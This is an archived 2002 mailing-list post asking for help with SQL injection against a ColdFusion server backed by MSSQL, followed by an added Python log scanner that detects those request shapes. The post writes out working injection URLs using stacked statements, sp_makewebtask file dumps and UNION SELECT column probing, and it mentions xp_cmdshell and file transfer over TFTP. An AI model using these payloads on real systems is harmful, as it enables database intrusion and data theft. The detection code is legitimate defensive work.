Hello pen-testers,

I am dealing with a pen-test against a CFM server with MSSQL as the backend. It is vulnerable to direct SQL injection. I figured out that I can create, drop, ... tables and execute xp_cmdshell and sp_makewebtask, so I submit:

http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"--

That is okay, and I want to get "C:\winnt\temp\blah.htm". I submit:

http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))--

and then I submit:

http://mysite/file.cfm?id=4567 UNION SELECT line from mrro--

It returns an error complaining that "All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists." So I keep adding "line" to my request URL (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--), and finally it returns an error message like this:

"[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image data type cannot be selected as DISTINCT."

My question: who can explain to me what happened?

I know there is another way to download or upload files using "tftp", so is there any free "tftp" server for me to use instead of installing a new one?

Thanks for reading.

Best regards,
mrro
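Added example, not part of the original post: a defender-side check that flags the request shapes quoted in the message (stacked statements, the two stored procedures it names, UNION SELECT, a trailing comment, and a non-integer id) when they appear in web server logs. The rule names, the NUMERIC_PARAMS set and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures derived from the request patterns quoted in the post above.
RULES = {
    "stacked_statement": re.compile(r";\s*(exec|execute|create|drop|insert|update|delete)\b", re.I),
    "extended_proc": re.compile(r"\b(xp_cmdshell|sp_makewebtask)\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers


def inspect_url(url):
    """Return the sorted rule names that fire on any decoded query parameter."""
    hits = set()
    # separator="&" keeps ';' inside the value; parse_qsl percent-decodes it.
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True, separator="&")
    for name, value in pairs:
        if name.lower() in NUMERIC_PARAMS and not value.strip().isdigit():
            hits.add("non_numeric_id")
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)


SAMPLE_LOG = [  # constructed request lines modelled on the URLs in the post
    "GET /file.cfm?id=4567 HTTP/1.1",
    "GET /file.cfm?id=4567;create%20table%20blah%20(line%20varchar(8000))-- HTTP/1.1",
    "GET /file.cfm?id=4567%20UNION%20SELECT%20line,line,line%20from%20mrro-- HTTP/1.1",
    "GET /file.cfm?id=4546;exec%20sp_makewebtask%20%22C:%5Cwinnt%5Ctemp%5Cblah.htm%22,"
    "%22select%20*%20from%20master..sysmessages%22-- HTTP/1.1",
]


def scan(lines):
    """Map each request target that triggers at least one rule to its hits."""
    findings = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue  # not a request line
        hits = inspect_url(parts[1])
        if hits:
            findings[parts[1]] = hits
    return findings


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_LOG).items():
        print(", ".join(hits), "<-", target)
```

The non_numeric_id rule is the most reliable of the five, because it does not depend on recognising any particular SQL keyword.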
This archive was generated by hypermail 2b30 : Fri Sep 13 2002 - 09:25:12 PDT